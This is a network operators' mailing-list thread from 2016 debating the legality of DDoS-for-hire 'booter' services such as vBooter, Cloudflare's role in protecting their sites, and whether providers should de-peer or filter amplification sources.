Vbooter (on their home page) claims: "#1 FREE WEBBASED SERVER STRESSER" "Using vBooter you can take down home internet connections, websites and game servers such us Minecraft, XBOX Live, PSN and many more." "You don't have to pay anything in order to use this stresser! In addition there are NO limits if you are a free user."
So they're advertising a free service that explicitly offers DDoS capabilities.
Now - with the caveat that I'm not a lawyer, and I'm talking from a US perspective only - as a sometimes hosting provider who pays attention to our legal liabilities, and >who's had one of our boxes compromised and used to vector a DDoS against a gaming site....
1. DDoS is clearly illegal under multiple statutes - most notably the Computer Fraud and Abuse Act - see https://www.justice.gov/sites/default/files/criminal->ccips/legacy/2015/01/14/ccmanual.pdf - for a Justice Dept. memo on "Prosecuting Computer Crimes." When coupled with threats, requests for payoffs, etc. - it expands into lots of other crimes (e.g., >extortion). And that's before one starts attacking Government-owned computer systems.
2. One might infer that, while "stress testing" is a legitimate and useful service - under specific circumstances, vBooter's tools might also fall under laws regarding >being an accomplice to a criminal act, aiding & abetting, "burglar's tools," etc., and more generally "creating a public nuisance."
3. There are also various (mostly state) laws against the sale of burglar's tools (e.g., sale of a lockpick to someone who's not a professional locksmith). I expect some >of those laws might apply.
4. All of those certainly could be applied to vBooter.org. Whether Cloudflare is liable for anything would seem to depend on whether Cloudflare is complicit in the use >of vBooter's use for criminal purposes, or promoting it's use therefore. Hosting would certainly fall into that category - and while, I have no direct knowledge that >Cloudflare hosts vBooter, they do provide nameservice, and their web server's IP address is in a network block registered to Cloudflare - that would seem to establish >complicity. Now if Cloudflare were to actively suggest that folks use vBooter to test systems, as a way to boost sales for Cloudflare - that would certainly be an >interesting test case for RICO (akin to McAfee encouraging folks to write and release viruses).
As to whether "Nothing is going to happen" - I expect something WILL happen, when somebody big, with a good legal department, gets hit by a really damaging DDoS attack, >and starts looking for some deep pockets to sue. Or, if somebody attacks the wrong Government computer and the FBI, or DoD, or DHS get ticked off.
It will make for very good theater - at least for anyone not directly in the cross-hairs.
Miles Fidelman
Keep in mind also, the victims of these DDoS attacks do not know which "booter" service was paid to attack them. The packets do not have "Stress test provided by vBooter" in them. The attack packets do not come from the booter's or Cloudflare's IP addresses, they come from secondary victims -- compromised servers, PC's infected with malware, and abused DNS/NTP [and a few other protocols] reflectors. It is impossible for a victim to submit a complaint to Cloudflare stating "I was attacked by someone paying vBooter", because they do not know which of the numerous "booter" services was responsible. -Phil
On Jul 28, 2016, at 12:12 PM, Naslund, Steve <SNaslund@medline.com> wrote:
Miles is right. Their thinly veiled "stress tester" thing is not going to be much of a defense. They must not have very good legal counsel. Here is the issue. Stress testing is perfectly legal as long as I am:
a) Stress testing my own stuff b) Stress testing your stuff WITH YOUR CONSENT
Selling a product or service that is unsafe can lead to serious civil consequences. For example, I sell you roach killer and don't warn you that it will also kill every other living thing in your home, I am going to get sued and lose badly.
Let's say I am running a demolition company that offers to knock down any house for a price. Don't you think I have a responsibility to verify that you own the house you just asked me to knock down? (by the way, this has happened in the real world -wrong address on paperwork- and the demolition company was held liable) Obviously I have that responsibility and obviously the same rules would apply to any service that can potentially damage someone's property.
Steven Naslund Chicago IL
Let's see:
Vbooter (on their home page) claims: "#1 FREE WEBBASED SERVER STRESSER" "Using vBooter you can take down home internet connections, websites and game servers such us Minecraft, XBOX Live, PSN and many more." "You don't have to pay anything in order to use this stresser! In addition there are NO limits if you are a free user."
So they're advertising a free service that explicitly offers DDoS capabilities.
Now - with the caveat that I'm not a lawyer, and I'm talking from a US perspective only - as a sometimes hosting provider who pays attention to our legal liabilities, and >who's had one of our boxes compromised and used to vector a DDoS against a gaming site....
1. DDoS is clearly illegal under multiple statutes - most notably the Computer Fraud and Abuse Act - see https://www.justice.gov/sites/default/files/criminal->ccips/legacy/2015/01/14/ccmanual.pdf - for a Justice Dept. memo on "Prosecuting Computer Crimes." When coupled with threats, requests for payoffs, etc. - it expands into lots of other crimes (e.g., >extortion). And that's before one starts attacking Government-owned computer systems.
2. One might infer that, while "stress testing" is a legitimate and useful service - under specific circumstances, vBooter's tools might also fall under laws regarding >being an accomplice to a criminal act, aiding & abetting, "burglar's tools," etc., and more generally "creating a public nuisance."
3. There are also various (mostly state) laws against the sale of burglar's tools (e.g., sale of a lockpick to someone who's not a professional locksmith). I expect some >of those laws might apply.
4. All of those certainly could be applied to vBooter.org. Whether Cloudflare is liable for anything would seem to depend on whether Cloudflare is complicit in the use >of vBooter's use for criminal purposes, or promoting it's use therefore. Hosting would certainly fall into that category - and while, I have no direct knowledge that >Cloudflare hosts vBooter, they do provide nameservice, and their web server's IP address is in a network block registered to Cloudflare - that would seem to establish >complicity. Now if Cloudflare were to actively suggest that folks use vBooter to test systems, as a way to boost sales for Cloudflare - that would certainly be an >interesting test case for RICO (akin to McAfee encouraging folks to write and release viruses).
As to whether "Nothing is going to happen" - I expect something WILL happen, when somebody big, with a good legal department, gets hit by a really damaging DDoS attack, >and starts looking for some deep pockets to sue. Or, if somebody attacks the wrong Government computer and the FBI, or DoD, or DHS get ticked off.
It will make for very good theater - at least for anyone not directly in the cross-hairs.
Miles Fidelman
They don't discriminate, anyone can be a customer https://www.youtube.com/watch?v=T4GfoSZ_sDc great quote from the reporter "why do you need a court order to do the right thing?" On Thu, Jul 28, 2016 at 12:20 PM, Phil Rosenthal <pr@isprime.com> wrote:
Keep in mind also, the victims of these DDoS attacks do not know which "booter" service was paid to attack them. The packets do not have "Stress test provided by vBooter" in them. The attack packets do not come from the booter's or Cloudflare's IP addresses, they come from secondary victims -- compromised servers, PC's infected with malware, and abused DNS/NTP [and a few other protocols] reflectors.
It is impossible for a victim to submit a complaint to Cloudflare stating "I was attacked by someone paying vBooter", because they do not know which of the numerous "booter" services was responsible.
On Jul 28, 2016, at 12:12 PM, Naslund, Steve <SNaslund@medline.com> wrote:
Miles is right. Their thinly veiled "stress tester" thing is not going to be much of a defense. They must not have very good legal counsel. Here is the issue. Stress testing is perfectly legal as long as I am:
a) Stress testing my own stuff b) Stress testing your stuff WITH YOUR CONSENT
Selling a product or service that is unsafe can lead to serious civil consequences. For example, I sell you roach killer and don't warn you that it will also kill every other living thing in your home, I am going to get sued and lose badly.
Let's say I am running a demolition company that offers to knock down any house for a price. Don't you think I have a responsibility to verify
-Phil that you own the house you just asked me to knock down? (by the way, this has happened in the real world -wrong address on paperwork- and the demolition company was held liable) Obviously I have that responsibility and obviously the same rules would apply to any service that can potentially damage someone's property.
Steven Naslund Chicago IL
Let's see:
Vbooter (on their home page) claims: "#1 FREE WEBBASED SERVER STRESSER" "Using vBooter you can take down home internet connections, websites
"You don't have to pay anything in order to use this stresser! In addition there are NO limits if you are a free user."
So they're advertising a free service that explicitly offers DDoS capabilities.
Now - with the caveat that I'm not a lawyer, and I'm talking from a US
and game servers such us Minecraft, XBOX Live, PSN and many more." perspective only - as a sometimes hosting provider who pays attention to our legal liabilities, and >who's had one of our boxes compromised and used to vector a DDoS against a gaming site....
1. DDoS is clearly illegal under multiple statutes - most notably the
ccips/legacy/2015/01/14/ccmanual.pdf
- for a Justice Dept. memo on "Prosecuting Computer Crimes." When coupled with threats, requests for payoffs, etc. - it expands into lots of other crimes (e.g., >extortion). And that's before one starts attacking Government-owned computer systems.
2. One might infer that, while "stress testing" is a legitimate and useful service - under specific circumstances, vBooter's tools might also fall under laws regarding >being an accomplice to a criminal act, aiding & abetting, "burglar's tools," etc., and more generally "creating a public nuisance."
3. There are also various (mostly state) laws against the sale of burglar's tools (e.g., sale of a lockpick to someone who's not a
Computer Fraud and Abuse Act - see https://www.justice.gov/sites/default/files/criminal- professional locksmith). I expect some >of those laws might apply.
4. All of those certainly could be applied to vBooter.org. Whether
Cloudflare is liable for anything would seem to depend on whether Cloudflare is complicit in the use >of vBooter's use for criminal purposes, or promoting it's use therefore. Hosting would certainly fall into that category - and while, I have no direct knowledge that >Cloudflare hosts vBooter, they do provide nameservice, and their web server's IP address is in a network block registered to Cloudflare - that would seem to establish complicity. Now if Cloudflare were to actively suggest that folks use vBooter to test systems, as a way to boost sales for Cloudflare - that would certainly be an >interesting test case for RICO (akin to McAfee encouraging folks to write and release viruses).
As to whether "Nothing is going to happen" - I expect something WILL
happen, when somebody big, with a good legal department, gets hit by a really damaging DDoS attack, >and starts looking for some deep pockets to sue. Or, if somebody attacks the wrong Government computer and the FBI, or DoD, or DHS get ticked off.
It will make for very good theater - at least for anyone not directly
in the cross-hairs.
Miles Fidelman
It is not beyond the realm of law enforcement to run down the entire chain of events all the way back to the “whodunit” and “howdunit”. It is pretty amazing what they can figure out when they put their minds to it and don’t underestimate what they can learn by getting someone in the hot seat under the bare light bulb. They also have lots of informants. Victim complaints don’t matter a bit to these guys, it will take the guys in the windbreakers kicking in the doors one of these days. Steven Naslund Chicago IL
On Thu, Jul 28, 2016 at 12:20 PM, Phil Rosenthal <pr@isprime.com<mailto:pr@isprime.com>> wrote: Keep in mind also, the victims of these DDoS attacks do not know which "booter" service was paid to attack them. The packets do not have "Stress test provided by vBooter" in them. The attack packets do not ?>come from the booter's or Cloudflare's IP addresses, they come from secondary victims -- compromised servers, PC's infected with malware, and abused DNS/NTP [and a few other protocols] reflectors.
It is impossible for a victim to submit a complaint to Cloudflare stating "I was attacked by someone paying vBooter", because they do not know which of the numerous "booter" services was responsible.
-Phil
Are you of the opinion that the victim of a DDoS attack who is not a multi-billion-dollar corporation would actually receive help from the FBI as a result of a DDoS attack? In the past, I have been told that the dollar-threshold for the FBI to even consider looking at a case was at least $2M in damages. This was 10 years ago, and I can't imagine the threshold has gone down. -Phil
On Jul 28, 2016, at 12:51 PM, Naslund, Steve <SNaslund@medline.com> wrote:
It is not beyond the realm of law enforcement to run down the entire chain of events all the way back to the “whodunit” and “howdunit”. It is pretty amazing what they can figure out when they put their minds to it and don’t underestimate what they can learn by getting someone in the hot seat under the bare light bulb. They also have lots of informants.
Victim complaints don’t matter a bit to these guys, it will take the guys in the windbreakers kicking in the doors one of these days.
Steven Naslund Chicago IL
On Thu, Jul 28, 2016 at 12:20 PM, Phil Rosenthal <pr@isprime.com<mailto:pr@isprime.com>> wrote: Keep in mind also, the victims of these DDoS attacks do not know which "booter" service was paid to attack them. The packets do not have "Stress test provided by vBooter" in them. The attack packets do not ?>come from the booter's or Cloudflare's IP addresses, they come from secondary victims -- compromised servers, PC's infected with malware, and abused DNS/NTP [and a few other protocols] reflectors.
It is impossible for a victim to submit a complaint to Cloudflare stating "I was attacked by someone paying vBooter", because they do not know which of the numerous "booter" services was responsible.
-Phil
No, as I said earlier, I am of the opinion that these networks get swept up once they go too big and hit something that law enforcement really cares about (read: embarrassed by). At that point they get everyone. You and I and our customers can't do much of anything until that point unless the service provider community gets aggravated enough to go to war with them. Thing is no one knows who is Senator Xs friend or has someone with enough pull to get a response. Eventually they all trip over one of those mines. Steven Naslund Chicago IL
-----Original Message----- From: Phil Rosenthal [mailto:pr@isprime.com] Sent: Thursday, July 28, 2016 11:57 AM To: Naslund, Steve Cc: nanog@nanog.org Subject: Re: EVERYTHING about Booters (and CloudFlare)
Are you of the opinion that the victim of a DDoS attack who is not a multi-billion-dollar corporation would actually receive help from the FBI as a result of a DDoS attack? In the past, I have been told that the dollar-threshold for the FBI to even consider looking at a case was at least $2M in damages. This was 10 years ago, and I can't imagine the threshold has gone down.
-Phil
The best analogy to real world would be to look at CloudFare as an arms dealer. They don't start the war but they sure enable it. The governments probably don't care who you sell arms to until their goat gets gored and then they are coming for you. Believe me they have more than enough laws on the books to find one that applies to just about any circumstance they want. In that world, legal and illegal don’t matter as much as who likes you and who doesn't. Steven Naslund Chicago IL
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal." Government in the US is not going to get involved as the financial cost won't warrant an investigation. Would you spend $100 to tow a car worth $1. Cloudflare, Amazon, Rackspace, and countless others are, and have been allowing the same thing since the dawn of their creation and network operators... Shame on you for allowing it. It is legal? Is it moral? Does it serve a real world benefit? (booters). Let's get real these booters serve little purpose. Anyone can go back to romper room and do the simple math: I have a 100mb pipe, if someone sends me 200mb will it flood me? A pre-schooler can give anyone the answer. Yet here is everyone chiming in on legal matters when not one respondent that I have seen is a lawyer. I wrote about this in my rambling which is linked in the NANOG LinkedIn group: "Why Do Networking Providers Like Cybercriminals So Much" and the responses I have read on this thread, make me believe it more so. Networking operators could give a rats ass about doing anything about DDoS, viruses. etc., since it is a source of revenue down the daisy chain. Like it or not. I would be surprised if ANYONE in this NOG, or any other "NOG" de-peered out of principle. With that said, I don't even know why this thread is being continued. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
You obviously have a much shorter Internet memory than some of the engineers on here that have had a long history of killing off and blacklisting various spam and malware operations over the years. I think the one thing that has changed is that the service providers are now large corporate entities that do not take going to war with each other as lightly as we did back in the day. Steven Naslund Chicago IL
-----Original Message----- From: J. Oquendo [mailto:joquendo@e-fensive.net] Sent: Thursday, July 28, 2016 12:17 PM To: Phil Rosenthal Cc: Naslund, Steve; nanog@nanog.org Subject: Cloudflare, dirty networks and politricks
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard >posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
Government in the US is not going to get involved as the financial cost won't warrant an investigation. Would you spend $100 to tow a car worth $1. Cloudflare, Amazon, Rackspace, and countless others are, and have been allowing the >same thing since the dawn of their creation and network operators... Shame on you for allowing it.
It is legal? Is it moral? Does it serve a real world benefit? (booters). Let's get real these booters serve little purpose. Anyone can go back to romper room and do the simple math: I have a 100mb pipe, if someone sends me 200mb >will it flood me? A pre-schooler can give anyone the answer. Yet here is everyone chiming in on legal matters when not one respondent that I have seen is a lawyer.
I wrote about this in my rambling which is linked in the NANOG LinkedIn group: "Why Do Networking Providers Like Cybercriminals So Much" and the responses I have read on this thread, make me believe it more so. Networking operators >could give a rats ass about doing anything about DDoS, viruses. etc., since it is a source of revenue down the daisy chain. Like it or not. I would be surprised if ANYONE in this NOG, or any other "NOG" de-peered out of principle. >With that said, I don't even know why this thread is being continued.
-- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
On Thu, 28 Jul 2016, Naslund, Steve wrote:
You obviously have a much shorter Internet memory than some of the engineers on here that have had a long history of killing off and blacklisting various spam and malware operations over the years. I think the one thing that has changed is that the service providers are now large corporate entities that do not take going to war with each other as lightly as we did back in the day.
Steven Naslund Chicago IL
It is this same attitude that throws everything into the loop we are seeing: "Well Mega Corporation is allowing it and we can't stop them lest we want to go to war with them." Define war. What will they do if you de-peer? They will find another provider to peer with it. That is it. There is no "war" no one is coming to our offices in full military gear. The more you guys allow this, the more it will continue. Start de-peering companies similar to BGP Dampening. "Oh didn't respond to our Nthousandth abuse. De-peered for N amount of time. Increment the time, and when some of these providers start seeing the cost of associating with these types of crimes (spam, malware), they have a choice, ship in or ship out. If ALL PROVIDERS did the same, who would a dirty host have left to peer with? Any other answer is nonsense and an excuse... "This will start a war!!!" Nonsense and quite possibly the sorriest excuse I have read for lifting a finger. 100 more people with the same response, means nothing will ever get done. OTOH ... Let's go back to "OMG THIS HAS TO STOP BUT I AM NOT GOING TO BE THE ONE LIFTING A FINGER!!! Because... ERMAHGERD WAR" -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
Be sure to let us all know how this works out for your business. On Thu, Jul 28, 2016 at 10:35 AM, J. Oquendo <joquendo@e-fensive.net> wrote:
On Thu, 28 Jul 2016, Naslund, Steve wrote:
You obviously have a much shorter Internet memory than some of the engineers on here that have had a long history of killing off and blacklisting various spam and malware operations over the years. I think the one thing that has changed is that the service providers are now large corporate entities that do not take going to war with each other as lightly as we did back in the day.
Steven Naslund Chicago IL
It is this same attitude that throws everything into the loop we are seeing: "Well Mega Corporation is allowing it and we can't stop them lest we want to go to war with them." Define war. What will they do if you de-peer? They will find another provider to peer with it. That is it. There is no "war" no one is coming to our offices in full military gear. The more you guys allow this, the more it will continue.
Start de-peering companies similar to BGP Dampening. "Oh didn't respond to our Nthousandth abuse. De-peered for N amount of time. Increment the time, and when some of these providers start seeing the cost of associating with these types of crimes (spam, malware), they have a choice, ship in or ship out. If ALL PROVIDERS did the same, who would a dirty host have left to peer with?
Any other answer is nonsense and an excuse... "This will start a war!!!" Nonsense and quite possibly the sorriest excuse I have read for lifting a finger. 100 more people with the same response, means nothing will ever get done. OTOH ... Let's go back to "OMG THIS HAS TO STOP BUT I AM NOT GOING TO BE THE ONE LIFTING A FINGER!!! Because... ERMAHGERD WAR"
-- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
"Where ignorance is our master, there is no possibility of real peace" - Dalai Lama
0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
On Thu, 28 Jul 2016, McDonald Richards wrote:
Be sure to let us all know how this works out for your business.
On Thu, Jul 28, 2016 at 10:35 AM, J. Oquendo <joquendo@e-fensive.net> wrote:
As stated... "Networkers don't give a rats ass about ethics/morals. Solely a fistful of dollars" In the interim, this conversation differs little from fergdawg's "How to Handle ISPs Who Turn a Blind Eye to Criminal Activity?" https://www.nanog.org/mailinglist/mailarchives/old_archive/2007-10/msg00348.... Back to what matters now... Money, because cybercrime meh. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
Feel free to demonstrate to us all how you're leading by example. Until then, as a consumer of "the Internet", I'd like my any-to-any access to remain that way. On Thu, Jul 28, 2016 at 11:52 AM, Seth Mattinen <sethm@rollernet.us> wrote:
On 7/28/16 11:24, McDonald Richards wrote:
Be sure to let us all know how this works out for your business.
And that's why these problems are such as they are.
~Seth
On 7/28/16 12:01, McDonald Richards wrote:
Feel free to demonstrate to us all how you're leading by example.
Until then, as a consumer of "the Internet", I'd like my any-to-any access to remain that way.
Again, and that's why these problems are such as they are. ~Seth
On 07/28/2016 10:17 AM, J. Oquendo wrote:
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
Let's supposed someone did indeed de-peer or otherwise block Cloudflare from their entire network. Which of y'all would be the first to say to that network operator, "Hope you enjoy your intranet"?
On Thu, 28 Jul 2016, Stephen Satchell wrote:
Let's supposed someone did indeed de-peer or otherwise block Cloudflare from their entire network.
Which of y'all would be the first to say to that network operator, "Hope you enjoy your intranet"?
Really? Again more boogeyman nonsense. The world does not revolve around Cloudflare or any other provider. If I were a customer, and my customers could not reach me, I would go to my provider. If I discovered my provider was being unethical in their practice, I would be an idiot to stay with them. "Hey its ok for me to conduct eCommerce transactions. I mean they're only allowing DoS, malware, ransomware." Tell me how would that work for you when your clients started jumping ship because your network is dirty. Again I go back to square one... The responders ("No you can never!!!") are those who truly could care less about the current state of garbage on the net. Masquerading it along the lines of: "Ermahgerd WAR!!!" "OMG YOU WILL ONLY HAVE AN INTRANET" "You can't be serious!!!" -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" <nanog-bounces@nanog.org on behalf of joquendo@e-fensive.net> wrote:
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
(long discussion, was waiting for a place to jump in..) If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they protect the website of seller of the product. We shouldn’t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services. If, on the other hand, you can find a specific network actually generating the volumes of DDoS, you should have a conversation about de-peering…. $0.02…
On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org> wrote:
On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" <nanog-bounces@nanog.org on behalf of joquendo@e-fensive.net> wrote:
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
(long discussion, was waiting for a place to jump in..)
If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they protect the website of seller of the product. We shouldn’t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
If, on the other hand, you can find a specific network actually generating the volumes of DDoS, you should have a conversation about de-peering….
$0.02…
It would be nice however if Cloudflare would announce there “freebie” ciders and the IP block that host their paying customers. Most of the abuse centers on the free clients.
The issue is that cloudfare in a way is generating their own market. If the ddos sites weren't protected by cloudfare they would eat each other alive. It's in their interest that their sites stay up so there is a need for their service. When GoDaddy hosts a bad site they aren't causing customer to sign up for the exact service for the protection they need from the bad site. Regards, Dovid -----Original Message----- From: TR Shaw <tshaw@oitc.com> Sender: "NANOG" <nanog-bounces@nanog.org>Date: Thu, 28 Jul 2016 19:45:14 To: Donn Lasher<D.Lasher@f5.com> Cc: nanog@nanog.org<nanog@nanog.org> Subject: Re: Cloudflare, dirty networks and politricks
On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org> wrote:
On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" <nanog-bounces@nanog.org on behalf of joquendo@e-fensive.net> wrote:
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
(long discussion, was waiting for a place to jump in..)
If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they protect the website of seller of the product. We shouldn’t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
If, on the other hand, you can find a specific network actually generating the volumes of DDoS, you should have a conversation about de-peering….
$0.02…
It would be nice however if Cloudflare would announce there “freebie” ciders and the IP block that host their paying customers. Most of the abuse centers on the free clients.
On Thursday, July 28, 2016, Dovid Bender <dovid@telecurve.com> wrote:
The issue is that cloudfare in a way is generating their own market. If the ddos sites weren't protected by cloudfare they would eat each other alive. It's in their interest that their sites stay up so there is a need for their service. When GoDaddy hosts a bad site they aren't causing customer to sign up for the exact service for the protection they need from the bad site.
I feel the same way about all the ddos protection rackets. But i genuinely feel Cloudflare is just a cdn that got good at fending off ddos just to stay alive. And they do a lot of good things with IPv6, dnssec, TLS 1.2++ , and open source. It is not fair to blame them for our (network operators) negligent open udp ampliers. We are the real problems. If Cloudflare did not host them, someone else would. Perhaps only on tor. But once you remove the open dns amplifiers, or put up the appropriate acls (bcp38 + blocks obviously abused ssdp, dns, ntp to the extent you can) , then you have really taking ddos capacity offline
Regards,
Dovid
-----Original Message----- From: TR Shaw <tshaw@oitc.com <javascript:;>> Sender: "NANOG" <nanog-bounces@nanog.org <javascript:;>>Date: Thu, 28 Jul 2016 19:45:14 To: Donn Lasher<D.Lasher@f5.com <javascript:;>> Cc: nanog@nanog.org <javascript:;><nanog@nanog.org <javascript:;>> Subject: Re: Cloudflare, dirty networks and politricks
On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org <javascript:;>> wrote:
On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" < nanog-bounces@nanog.org <javascript:;> on behalf of joquendo@e-fensive.net <javascript:;>> wrote:
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
(long discussion, was waiting for a place to jump in..)
If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they protect the website of seller of the product. We shouldn’t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
If, on the other hand, you can find a specific network actually generating the volumes of DDoS, you should have a conversation about de-peering….
$0.02…
It would be nice however if Cloudflare would announce there “freebie” ciders and the IP block that host their paying customers. Most of the abuse centers on the free clients.
On Jul 28, 2016, at 7:30 PM, Donn Lasher via NANOG <nanog@nanog.org> wrote:
On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" <nanog-bounces@nanog.org on behalf of joquendo@e-fensive.net> wrote:
While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
(long discussion, was waiting for a place to jump in..)
If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they protect the website of seller of the product. We shouldn’t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
If, on the other hand, you can find a specific network actually generating the volumes of DDoS, you should have a conversation about de-peering….
$0.02…
On one hand, I agree with you… “We should no more de-peer Cloud Flare over sites they protect than we would de-peer GoDaddy over sites they host.” However, if GoDaddy or Cloud Flare consistently refused to take down sites which specifically sell malicious activities as a service, I see no reason not to consider de-peering either one of them. I’m not well enough versed in the exact details of the alleged actions/non-actions of CF in this scenario, but the idea that we should not apply rational peer pressure against the accessible indirect party in favor of playing whack-a-mole with the less accessible directly offending party seems patently absurd to me. The actual dDOS is probably not even performed by the company advertising the service, but rather by one ore more bot-nets that they either directly control (pwn, but don’t own) or contract (someone else pwned the machines and sells bot services to them). It’s one thing if a site is advertising legitimate load or stress testing abilities and is conducting itself in an ethical manner. Its an entirely different matter if the site is advertising their ability to carry out malicious attacks for hire (e.g. “We can take down XYZ for mere pennies per hour.”, etc.). In the latter case, I would expect any ethical company that found themselves hosting such content to take swift action against such a customer for TOS/AUP violation. In the former, there’s likely nothing wrong there and while you may not like what they do, it may well be a legitimate service, none-the-less. Now there is a bit of a grey area which probably merits consideration… What if company A runs a web-site. They are a transit customer of company B. Company C is the VPS hosting company which is under contract to company D to provide machines and bandwidth for their “Security Testing Products.”. (Quick cheat-diagram to make the rest easier to follow) [Web Site A] <-> [Transit B] <-> {internet} <-> [VPS Host C] <-> [“Security Contractor” D] Suppose company A dramatically overestimates their needed stress level for a traffic test and contracts company D to send them a stress test which turns out to overwhelm the peering between B and C. Clearly, this is problematic to both B and C, but it’s not clear that it’s an actual violation or that either A or D has actually done anything wrong, per se. I would expect D to cease and desist promptly upon notification from C or A. Ideally they would also politely cease and desist upon credible request from company B, but the definition of credible is somewhat difficult here and may be subjective (B will generally consider themselves credible whether C does or not). The problem may extend further, depending on whether B and C are directly peered or are connected via some additional set of transit networks in between. (see footnote [1] for exact definitions of peering and transit intended in this message. Short version: packet flow, not money). Obviously the more transit networks impacted, the more complex the issue becomes. Owen [1] peering: The advertising of routes to and acceptance of packets for ones own autonomous system(s) and those autonomous systems for which you provide transit. transit: The advertising of all known routes, default, or some superset of the above definition of peering and the willingness to accept, carry, and pass along packets destined to other peers and/or transit providers beyond the limits set by peering above.
On Thursday, July 28, 2016, Donn Lasher via NANOG <nanog@nanog.org> wrote:
On 7/28/16, 10:17 AM, "NANOG on behalf of J. Oquendo" < nanog-bounces@nanog.org <javascript:;> on behalf of joquendo@e-fensive.net <javascript:;>> wrote:
